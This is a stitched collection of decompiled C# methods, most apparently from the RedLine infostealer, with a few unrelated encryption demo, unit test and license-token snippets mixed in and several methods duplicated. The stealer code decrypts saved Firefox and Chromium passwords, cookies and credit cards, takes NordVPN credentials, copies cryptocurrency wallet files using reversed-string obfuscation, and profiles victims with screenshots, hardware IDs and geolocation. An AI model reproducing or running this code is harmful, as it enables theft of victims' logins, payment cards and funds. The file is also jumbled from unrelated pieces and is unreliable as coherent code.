private static byte[] GetPrivate3Key(string file)
{
byte[] array = new byte[24];
try
{
if (!File.Exists(file))
{
return(array);
}
new DataTable();
GeckoDatabase berkeleyDB = new GeckoDatabase(file);
PasswordCheck passwordCheck = new PasswordCheck(ParseDb(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = ParseDb(berkeleyDB, (string x) => x.Equals("global-salt"));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
geckoPasswordBasedEncryption.Init();
TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck));
Asn1Object asn1Object = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"))));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData);
geckoPasswordBasedEncryption2.Init();
Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData))).Objects[0].Objects[2].ObjectData);
if (asn1Object2.Objects[0].Objects[3].ObjectData.Length <= 24)
{
array = asn1Object2.Objects[0].Objects[3].ObjectData;
return(array);
}
Array.Copy(asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, array, 0, 24);
return(array);
}
catch
{
return(array);
}
}
private static List <LoginPair> ParseLogins(string profile, byte[] privateKey)
{
List <LoginPair> loginPairList = new List <LoginPair>();
try
{
string tempCopy = DecryptHelper.CreateTempCopy(Path.Combine(profile, "logins.json"));
if (!File.Exists(tempCopy))
{
return(loginPairList);
}
foreach (JsonValue jsonValue in (IEnumerable)File.ReadAllText(tempCopy).FromJSON()["logins"])
{
Asn1Object asn1Object1 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false)));
Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false)));
string str1 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object1.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object1.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string str2 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
LoginPair loginPair = new LoginPair()
{
Host = string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false), Login = string.IsNullOrEmpty(str1) ? "UNKNOWN" : str1, Password = string.IsNullOrEmpty(str2) ? "UNKNOWN" : str2
};
if (loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN")
{
loginPairList.Add(loginPair);
}
}
}
catch
{
}
return(loginPairList);
}
// Token: 0x060002C7 RID: 711 RVA: 0x0000C99C File Offset: 0x0000AB9C
private static List <LoginPair> GetCredentials(string profile)
{
List <LoginPair> list = new List <LoginPair>();
try
{
if (File.Exists(Path.Combine(profile, "key3.db")))
{
bool flag;
string text = DecryptHelper.TryCreateTemp(Path.Combine(profile, "key3.db"), out flag);
list.AddRange(GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate4Key(text)));
if (flag)
{
File.Delete(text);
}
}
if (File.Exists(Path.Combine(profile, "key4.db")))
{
bool flag2;
string text2 = DecryptHelper.TryCreateTemp(Path.Combine(profile, "key4.db"), out flag2);
list.AddRange(GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate4Key(text2)));
if (flag2)
{
File.Delete(text2);
}
}
}
catch (Exception)
{
}
return(list);
}
public static List <Browser> ParseBrowsers()
{
List <Browser> browserList = new List <Browser>();
try
{
List <string> stringList = new List <string>();
stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.LocalAppData, 4, 1, "key3.db", "key4.db", "cookies.sqlite", "logins.json"));
stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.RoamingAppData, 4, 1, "key3.db", "key4.db", "cookies.sqlite", "logins.json"));
foreach (string fileName in stringList)
{
string fullName = new FileInfo(fileName).Directory.FullName;
string str = fileName.Contains(RedLine.Logic.Helpers.Constants.RoamingAppData) ? GeckoEngine.GetRoamingName(fullName) : GeckoEngine.GetLocalName(fullName);
if (!string.IsNullOrEmpty(str))
{
Browser browser = new Browser()
{
Name = str, Profile = new DirectoryInfo(fullName).Name, Cookies = (IList <Cookie>) new List <Cookie>((IEnumerable <Cookie>)GeckoEngine.ParseCookies(fullName)).IsNull <List <Cookie> >(), Credentials = (IList <LoginPair>) new List <LoginPair>((IEnumerable <LoginPair>)GeckoEngine.GetCredentials(fullName).IsNull <List <LoginPair> >()).IsNull <List <LoginPair> >(), Autofills = (IList <Autofill>) new List <Autofill>(), CreditCards = (IList <CreditCard>) new List <CreditCard>()
};
if (browser.Cookies.Count <Cookie>((Func <Cookie, bool>)(x => x.IsNotNull <Cookie>())) > 0 || browser.Credentials.Count <LoginPair>((Func <LoginPair, bool>)(x => x.IsNotNull <LoginPair>())) > 0)
{
browserList.Add(browser);
}
}
}
}
catch
{
}
return(browserList);
}
static void Main(string[] args)
{
bool pass = false;
string ans = "ABC123";
do
{
Console.WriteLine(string.Format("Please type \"{0}\"", ans));
string input = Console.ReadLine();
EncryptHelper encryptor = new EncryptHelper();
string encryptString = encryptor.EncryptData(input, Algorithm.StringTransformationFormat.UTF8, Algorithm.Cryptography.AES, Algorithm.StringEncodeFormat.Base64);
Console.WriteLine(string.Format("Encrypted String: {0}", encryptString));
Console.WriteLine(string.Format("Encrypted Password & Salt is {0} & {1}", encryptor.Password, encryptor.Salt));
DecryptHelper decryptor = new DecryptHelper(encryptor.Password, encryptor.Salt);
string originalInput = decryptor.DecryptData(encryptString, Algorithm.StringEncodeFormat.Base64, Algorithm.Cryptography.AES, Algorithm.StringTransformationFormat.UTF8);
Console.WriteLine(string.Format("Decrypted String: {0}", originalInput));
encryptString = encryptor.EncryptData(input, Algorithm.StringTransformationFormat.UTF8, Algorithm.Cryptography.RSA, Algorithm.StringEncodeFormat.Base64);
Console.WriteLine(string.Format("Encrypted String: {0}", encryptString));
Console.WriteLine(string.Format("Encrypted Password is {0}", encryptor.Password));
originalInput = decryptor.DecryptData(encryptString, Algorithm.StringEncodeFormat.Base64, Algorithm.Cryptography.RSA, Algorithm.StringTransformationFormat.UTF8);
Console.WriteLine(string.Format("Decrypted String: {0}", originalInput));
encryptor.ClearRSAKeyContainer();
if (input == ans)
{
pass = true;
}
}while (!pass);
}
// Token: 0x06000191 RID: 401 RVA: 0x00004A38 File Offset: 0x00002C38
public static IList <ColdWallet> ParseFiles()
{
List <ColdWallet> list = new List <ColdWallet>();
try
{
List <string> list2 = DecryptHelper.FindPaths(Constants.RoamingAppData, 2, 1, new string[]
{
new string("tad.tellaw".Reverse <char>().ToArray <char>()),
new string("tellaw".Reverse <char>().ToArray <char>())
});
list2.AddRange(DecryptHelper.FindPaths(Constants.LocalAppData, 2, 1, new string[]
{
new string("tad.tellaw".Reverse <char>().ToArray <char>()),
new string("tellaw".Reverse <char>().ToArray <char>())
}));
foreach (string text in list2)
{
try
{
FileInfo fileInfo = new FileInfo(text);
list.Add(new ColdWallet
{
DataArray = File.ReadAllBytes(text),
FileName = fileInfo.Name,
WalletName = fileInfo.Directory.Name,
WalletDir = fileInfo.Directory.Name
});
}
catch
{
}
}
List <ColdWallet> list3 = new List <ColdWallet>();
list3.AddRange(ColdWalletsGrabber.ParseElectrum());
list3.AddRange(ColdWalletsGrabber.ParseEth());
list3.AddRange(ColdWalletsGrabber.ParseExodus());
list3.AddRange(ColdWalletsGrabber.ParseGuarda());
list3.AddRange(ColdWalletsGrabber.ParseAtomic());
list3.AddRange(ColdWalletsGrabber.ParseCoinomi());
list3.AddRange(ColdWalletsGrabber.ParseWaves());
list3.AddRange(ColdWalletsGrabber.ParseJaxx());
ColdWallet item = ColdWalletsGrabber.ParseMonero();
if (!string.IsNullOrWhiteSpace(item.FileName))
{
list.Add(item);
}
foreach (ColdWallet item2 in list3)
{
list.Add(item2);
}
}
catch (Exception)
{
}
return(list);
}
public static UserLog Create(ClientSettings settings)
{
UserLog userLog = new UserLog();
try
{
GeoInfo geoInfo = GeoHelper.Get();
IList <string> blacklistedCountry = settings.BlacklistedCountry;
if (blacklistedCountry != null && blacklistedCountry.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country))
{
InstallManager.RemoveCurrent();
}
WmiDiskDrive wmiDiskDrive = new WmiService().QueryFirst <WmiDiskDrive>(new WmiDiskDriveQuery());
Size size = Screen.PrimaryScreen.Bounds.Size;
string text = System.TimeZone.CurrentTimeZone.GetUtcOffset(DateTime.Now).ToString();
if (!text.StartsWith("-"))
{
text = "+" + text;
}
userLog.IP = geoInfo.IP;
userLog.Location = geoInfo.Location;
userLog.Country = geoInfo.Country;
userLog.Screenshot = CaptureScreen();
userLog.UserAgent = UserAgentDetector.GetUserAgent();
IList <string> blacklistedCountry2 = settings.BlacklistedCountry;
if (blacklistedCountry2 != null && blacklistedCountry2.Count > 0 && settings.BlacklistedCountry.Contains(geoInfo.Country))
{
InstallManager.RemoveCurrent();
}
userLog.HWID = DecryptHelper.GetMd5Hash(Environment.UserDomainName + Environment.UserName + wmiDiskDrive.SerialNumber).Replace("-", string.Empty);
userLog.CurrentLanguage = InputLanguage.CurrentInputLanguage.Culture.EnglishName;
userLog.TimeZone = "UTC" + text;
userLog.MonitorSize = $"{size.Width}x{size.Height}";
userLog.IsProcessElevated = NativeMethods.IsUserAnAdmin();
userLog.UacType = UacHelper.AdminPromptBehavior;
userLog.OS = OsDetector.GetWindowsVersion();
userLog.Username = Environment.UserName;
return(userLog);
}
catch
{
return(userLog);
}
finally
{
userLog.HWID = (string.IsNullOrWhiteSpace(userLog.HWID) ? "UNKNOWN" : userLog.HWID);
userLog.IP = (string.IsNullOrWhiteSpace(userLog.IP) ? "UNKNOWN" : userLog.IP);
userLog.MonitorSize = (string.IsNullOrWhiteSpace(userLog.MonitorSize) ? "UNKNOWN" : userLog.MonitorSize);
userLog.OS = (string.IsNullOrWhiteSpace(userLog.OS) ? "UNKNOWN" : userLog.OS);
userLog.TimeZone = (string.IsNullOrWhiteSpace(userLog.TimeZone) ? "UNKNOWN" : userLog.TimeZone);
userLog.Username = (string.IsNullOrWhiteSpace(userLog.Username) ? "UNKNOWN" : userLog.Username);
userLog.Location = (string.IsNullOrWhiteSpace(userLog.Location) ? "UNKNOWN" : userLog.Location);
userLog.Country = (string.IsNullOrWhiteSpace(userLog.Country) ? "UNKNOWN" : userLog.Country);
userLog.CurrentLanguage = (string.IsNullOrWhiteSpace(userLog.CurrentLanguage) ? "UNKNOWN" : userLog.CurrentLanguage);
userLog.UserAgent = (string.IsNullOrWhiteSpace(userLog.UserAgent) ? "UNKNOWN" : userLog.UserAgent);
}
}
public void Test()
{
var encryptor = new EncryptHelper(PublicRSAParameters);
var decryptor = new DecryptHelper(PrivateRSAParameters);
var str = RandomStringGen();
var encData = encryptor.Encrypt(str).Result;
var resultStr = decryptor.DecryptToString(encData).Result;
Assert.AreEqual(str, resultStr);
}
private static string DecryptV10(string localStatePath, string chiperText)
{
int length = 12;
string str1 = "v10";
string str2 = "DPAPI";
string empty = string.Empty;
byte[] key = DecryptHelper.DecryptBlob(Encoding.Default.GetBytes(Encoding.Default.GetString(Convert.FromBase64String(File.ReadAllText(localStatePath).FromJSON()["os_crypt"]["encrypted_key"].ToString(false))).Substring(str2.Length)), DataProtectionScope.CurrentUser, (byte[])null);
byte[] bytes = Encoding.Default.GetBytes(chiperText.Substring(str1.Length, length));
return(AesGcm256.Decrypt(Encoding.Default.GetBytes(chiperText.Substring(length + str1.Length)), key, bytes));
}
// Token: 0x0600019B RID: 411 RVA: 0x0000557C File Offset: 0x0000377C
public static List <LoginPair> GetProfile()
{
List <LoginPair> list = new List <LoginPair>();
try
{
DirectoryInfo directoryInfo = new DirectoryInfo(Path.Combine(Constants.LocalAppData, "NordVPN"));
if (!directoryInfo.Exists)
{
return(list);
}
DirectoryInfo[] directories = directoryInfo.GetDirectories("NordVpn.exe*");
for (int i = 0; i < directories.Length; i++)
{
foreach (DirectoryInfo directoryInfo2 in directories[i].GetDirectories())
{
try
{
string text = Path.Combine(directoryInfo2.FullName, "user.config");
if (File.Exists(text))
{
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load(text);
string innerText = xmlDocument.SelectSingleNode("//setting[@name='Username']/value").InnerText;
string innerText2 = xmlDocument.SelectSingleNode("//setting[@name='Password']/value").InnerText;
if (!string.IsNullOrWhiteSpace(innerText) && !string.IsNullOrWhiteSpace(innerText2))
{
string @string = Encoding.UTF8.GetString(DecryptHelper.DecryptBlob(Convert.FromBase64String(innerText), DataProtectionScope.LocalMachine, null));
string string2 = Encoding.UTF8.GetString(DecryptHelper.DecryptBlob(Convert.FromBase64String(innerText2), DataProtectionScope.LocalMachine, null));
if (!string.IsNullOrWhiteSpace(@string) && !string.IsNullOrWhiteSpace(string2))
{
list.Add(new LoginPair
{
Login = @string,
Password = string2
});
}
}
}
}
catch
{
}
}
}
}
catch
{
}
return(list);
}
private static List <Cookie> EnumCook(string profilePath)
{
List <Cookie> list = new List <Cookie>();
try
{
string text = Path.Combine(profilePath, "Cookies");
if (!File.Exists(text))
{
return(list);
}
string[] array = profilePath.Split(new string[1]
{
"\\"
}, StringSplitOptions.RemoveEmptyEntries);
array = array.Take(array.Length - 1).ToArray();
string localStatePath = Path.Combine(string.Join("\\", array), "Local State");
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text));
sqlConnection.ReadTable("cookies");
for (int i = 0; i < sqlConnection.RowLength; i++)
{
Cookie cookie = null;
try
{
cookie = new Cookie
{
Host = sqlConnection.ParseValue(i, "host_key").Trim(),
Http = (sqlConnection.ParseValue(i, "httponly") == "1"),
Path = sqlConnection.ParseValue(i, "path").Trim(),
Secure = (sqlConnection.ParseValue(i, "secure") == "1"),
Expires = sqlConnection.ParseValue(i, "expires_utc").Trim(),
Name = sqlConnection.ParseValue(i, "name").Trim(),
Value = DecryptChromium(sqlConnection.ParseValue(i, "encrypted_value"), localStatePath)
};
}
catch
{
}
if (cookie != null)
{
list.Add(cookie);
}
}
return(list);
}
catch
{
return(list);
}
}
private static string DecryptV10(string localStatePath, string chiperText)
{
int num = 12;
string text = "v10";
string text2 = "DPAPI";
_ = string.Empty;
string s = File.ReadAllText(localStatePath).FromJSON()["os_crypt"]["encrypted_key"].ToString(saving: false);
string s2 = Encoding.Default.GetString(Convert.FromBase64String(s)).Substring(text2.Length);
byte[] key = DecryptHelper.DecryptBlob(Encoding.Default.GetBytes(s2), DataProtectionScope.CurrentUser);
byte[] bytes = Encoding.Default.GetBytes(chiperText.Substring(text.Length, num));
return(AesGcm256.Decrypt(Encoding.Default.GetBytes(chiperText.Substring(num + text.Length)), key, bytes));
}
private static List <string> GetProfile()
{
List <string> stringList = new List <string>();
try
{
stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.RoamingAppData, 4, 1, "Login Data", "Web Data", "Cookies"));
stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.LocalAppData, 4, 1, "Login Data", "Web Data", "Cookies"));
}
catch
{
}
return(stringList);
}
// Token: 0x060002C8 RID: 712 RVA: 0x0000CA48 File Offset: 0x0000AC48
private static List <Cookie> ParseCookies(string profile)
{
List <Cookie> list = new List <Cookie>();
try
{
string text = Path.Combine(profile, "cookies.sqlite");
if (!File.Exists(text))
{
return(list);
}
bool flag;
string text2 = DecryptHelper.TryCreateTemp(text, out flag);
SqlConnection sqlConnection = new SqlConnection(text2);
sqlConnection.ReadTable("moz_cookies");
for (int i = 0; i < sqlConnection.RowLength; i++)
{
Cookie cookie = null;
try
{
cookie = new Cookie
{
Host = sqlConnection.ParseValue(i, "host").Trim(),
Http = sqlConnection.ParseValue(i, "host").Trim().StartsWith("."),
Path = sqlConnection.ParseValue(i, "path").Trim(),
Secure = (sqlConnection.ParseValue(i, "isSecure") == "1"),
Expires = Convert.ToInt64(sqlConnection.ParseValue(i, "expiry").Trim()),
Name = sqlConnection.ParseValue(i, "name").Trim(),
Value = sqlConnection.ParseValue(i, "value")
};
}
catch
{
}
if (cookie != null)
{
list.Add(cookie);
}
}
if (flag)
{
File.Delete(text2);
}
}
catch
{
}
return(list);
}
private static List <string> GetProfile()
{
List <string> list = new List <string>();
try
{
list.AddRange(DecryptHelper.FindPaths(Constants.RoamingAppData, 4, 1, "Login Data", "Web Data", "Cookies"));
list.AddRange(DecryptHelper.FindPaths(Constants.LocalAppData, 4, 1, "Login Data", "Web Data", "Cookies"));
return(list);
}
catch
{
return(list);
}
}
// Token: 0x060002CB RID: 715 RVA: 0x0000D09C File Offset: 0x0000B29C
private static byte[] GetPrivate3Key(string file)
{
byte[] array = new byte[24];
try
{
if (!File.Exists(file))
{
return(array);
}
MethodInfo method = typeof(Array).GetMethod("Copy", new Type[]
{
typeof(Array),
typeof(int),
typeof(Array),
typeof(int),
typeof(int)
});
GeckoDatabase berkeleyDB = new GeckoDatabase(file);
PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("global-salt"));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
geckoPasswordBasedEncryption.Init();
TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None);
Asn1Object asn1Object = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"))));
GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData);
geckoPasswordBasedEncryption2.Init();
Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.GetEncoding("windows-1251").GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData);
if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24)
{
method.Invoke(null, new object[]
{
asn1Object2.Objects[0].Objects[3].ObjectData,
asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24,
array,
0,
24
});
}
else
{
array = asn1Object2.Objects[0].Objects[3].ObjectData;
}
}
catch
{
}
return(array);
}
private static List <CreditCard> EnumCC(string profilePath)
{
List <CreditCard> list = new List <CreditCard>();
try
{
string text = Path.Combine(profilePath, "Web Data");
if (!File.Exists(text))
{
return(list);
}
string[] array = profilePath.Split(new string[1]
{
"\\"
}, StringSplitOptions.RemoveEmptyEntries);
array = array.Take(array.Length - 1).ToArray();
string localStatePath = Path.Combine(string.Join("\\", array), "Local State");
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text));
sqlConnection.ReadTable("credit_cards");
for (int i = 0; i < sqlConnection.RowLength; i++)
{
CreditCard creditCard = null;
try
{
creditCard = new CreditCard
{
Holder = sqlConnection.ParseValue(i, "name_on_card").Trim(),
ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_month").Trim()),
ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_year").Trim()),
CardNumber = DecryptChromium(sqlConnection.ParseValue(i, "card_number_encrypted"), localStatePath)
};
}
catch
{
}
if (creditCard != null)
{
list.Add(creditCard);
}
}
return(list);
}
catch
{
return(list);
}
}
private static List <Cookie> EnumCook(string profilePath)
{
List <Cookie> cookieList = new List <Cookie>();
try
{
string str = Path.Combine(profilePath, "Cookies");
if (!File.Exists(str))
{
return(cookieList);
}
string[] strArray = profilePath.Split(new string[1] {
"\\"
}, StringSplitOptions.RemoveEmptyEntries);
string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State");
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str));
sqlConnection.ReadTable("cookies");
for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex)
{
Cookie cookie = (Cookie)null;
try
{
cookie = new Cookie()
{
Host = sqlConnection.ParseValue(rowIndex, "host_key").Trim(),
Http = sqlConnection.ParseValue(rowIndex, "httponly") == "1",
Path = sqlConnection.ParseValue(rowIndex, "path").Trim(),
Secure = sqlConnection.ParseValue(rowIndex, "secure") == "1",
Expires = sqlConnection.ParseValue(rowIndex, "expires_utc").Trim(),
Name = sqlConnection.ParseValue(rowIndex, "name").Trim(),
Value = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "encrypted_value"), localStatePath)
};
}
catch
{
}
if (cookie != null)
{
cookieList.Add(cookie);
}
}
}
catch
{
}
return(cookieList);
}
private static List <CreditCard> EnumCC(string profilePath)
{
List <CreditCard> creditCardList = new List <CreditCard>();
try
{
string str = Path.Combine(profilePath, "Web Data");
if (!File.Exists(str))
{
return(creditCardList);
}
string[] strArray = profilePath.Split(new string[1] {
"\\"
}, StringSplitOptions.RemoveEmptyEntries);
string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State");
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str));
sqlConnection.ReadTable("credit_cards");
for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex)
{
CreditCard creditCard = (CreditCard)null;
try
{
creditCard = new CreditCard()
{
Holder = sqlConnection.ParseValue(rowIndex, "name_on_card").Trim(),
ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_month").Trim()),
ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_year").Trim()),
CardNumber = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "card_number_encrypted"), localStatePath)
};
}
catch
{
}
if (creditCard != null)
{
creditCardList.Add(creditCard);
}
}
}
catch
{
}
return(creditCardList);
}
private static List <Cookie> ParseCookies(string profile)
{
List <Cookie> list = new List <Cookie>();
try
{
string text = Path.Combine(profile, "cookies.sqlite");
if (!File.Exists(text))
{
return(list);
}
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text));
sqlConnection.ReadTable("moz_cookies");
for (int i = 0; i < sqlConnection.RowLength; i++)
{
Cookie cookie = null;
try
{
cookie = new Cookie
{
Host = sqlConnection.ParseValue(i, "host").Trim(),
Http = (sqlConnection.ParseValue(i, "isSecure") == "1"),
Path = sqlConnection.ParseValue(i, "path").Trim(),
Secure = (sqlConnection.ParseValue(i, "isSecure") == "1"),
Expires = sqlConnection.ParseValue(i, "expiry").Trim(),
Name = sqlConnection.ParseValue(i, "name").Trim(),
Value = sqlConnection.ParseValue(i, "value")
};
}
catch
{
}
if (cookie != null)
{
list.Add(cookie);
}
}
return(list);
}
catch
{
return(list);
}
}
private static string DecryptChromium(string chiperText, string localStatePath)
{
string result = string.Empty;
try
{
if (chiperText.StartsWith("v10"))
{
result = DecryptV10(localStatePath, chiperText);
return(result);
}
result = DecryptHelper.DecryptBlob(chiperText, DataProtectionScope.CurrentUser).Trim();
return(result);
}
catch
{
return(result);
}
}
/// <summary>
/// EyesFree license token 更新
/// </summary>
private void SetToken()
{
var result = new EyesFreeToken();
foreach (var address in NetworkCard.MacAddresses)
{
result = DecryptHelper.Decrypt <EyesFreeToken>(_licenseKey, address);
if (result != null)
{
// Token
_token = result;
// Valid MAC
_validMacAddress = address;
return;
}
}
}
private static List <Cookie> ParseCookies(string profile)
{
List <Cookie> cookieList = new List <Cookie>();
try
{
string str = Path.Combine(profile, "cookies.sqlite");
if (!File.Exists(str))
{
return(cookieList);
}
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str));
sqlConnection.ReadTable("moz_cookies");
for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex)
{
Cookie cookie = (Cookie)null;
try
{
cookie = new Cookie()
{
Host = sqlConnection.ParseValue(rowIndex, "host").Trim(),
Http = sqlConnection.ParseValue(rowIndex, "isSecure") == "1",
Path = sqlConnection.ParseValue(rowIndex, "path").Trim(),
Secure = sqlConnection.ParseValue(rowIndex, "isSecure") == "1",
Expires = sqlConnection.ParseValue(rowIndex, "expiry").Trim(),
Name = sqlConnection.ParseValue(rowIndex, "name").Trim(),
Value = sqlConnection.ParseValue(rowIndex, "value")
};
}
catch
{
}
if (cookie != null)
{
cookieList.Add(cookie);
}
}
}
catch
{
}
return(cookieList);
}
private static byte[] GetPrivate3Key(string file)
{
byte[] numArray = new byte[24];
try
{
if (!File.Exists(file))
{
return(numArray);
}
DataTable dataTable = new DataTable();
GeckoDatabase berkeleyDB = new GeckoDatabase(file);
PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("password-check"))));
string db = GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("global-salt")));
GeckoPasswordBasedEncryption passwordBasedEncryption1 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
passwordBasedEncryption1.Init();
TripleDESHelper.Decrypt(passwordBasedEncryption1.DataKey, passwordBasedEncryption1.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None);
Asn1Object asn1Object1 = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x =>
{
if (!x.Equals("password-check") && !x.Equals("Version"))
{
return(!x.Equals("global-salt"));
}
return(false);
}))));
GeckoPasswordBasedEncryption passwordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), asn1Object1.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData);
passwordBasedEncryption2.Init();
Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(TripleDESHelper.Decrypt(passwordBasedEncryption2.DataKey, passwordBasedEncryption2.DataIV, asn1Object1.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData);
if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24)
{
Array.Copy((Array)asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, (Array)numArray, 0, 24);
}
else
{
numArray = asn1Object2.Objects[0].Objects[3].ObjectData;
}
}
catch
{
}
return(numArray);
}
private static List <LoginPair> GetCredentials(string profilePath)
{
List <LoginPair> list = new List <LoginPair>();
try
{
string text = Path.Combine(profilePath, "Login Data");
if (!File.Exists(text))
{
return(list);
}
string[] array = profilePath.Split(new string[1]
{
"\\"
}, StringSplitOptions.RemoveEmptyEntries);
array = array.Take(array.Length - 1).ToArray();
string localStatePath = Path.Combine(string.Join("\\", array), "Local State");
SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(text));
sqlConnection.ReadTable("logins");
for (int i = 0; i < sqlConnection.RowLength; i++)
{
LoginPair loginPair = new LoginPair();
try
{
loginPair = ReadData(sqlConnection, i, localStatePath);
}
catch
{
}
if (loginPair.Login.IsNotNull() && loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN")
{
list.Add(loginPair);
}
}
return(list);
}
catch
{
return(list);
}
}
// Token: 0x060002E5 RID: 741 RVA: 0x0000E808 File Offset: 0x0000CA08
private static string DecryptChromium(string chiperText, string chromeKey)
{
string result = string.Empty;
try
{
if (chiperText.StartsWith("v10") || chiperText.StartsWith("v11"))
{
result = ChromiumEngine.DecryptV10(chromeKey, chiperText);
}
else
{
result = DecryptHelper.DecryptBlob(chiperText, DataProtectionScope.CurrentUser, null).Trim();
}
}
catch (Exception value)
{
Console.WriteLine(value);
}
return(result);
}
// Token: 0x060002C9 RID: 713 RVA: 0x0000CBD0 File Offset: 0x0000ADD0
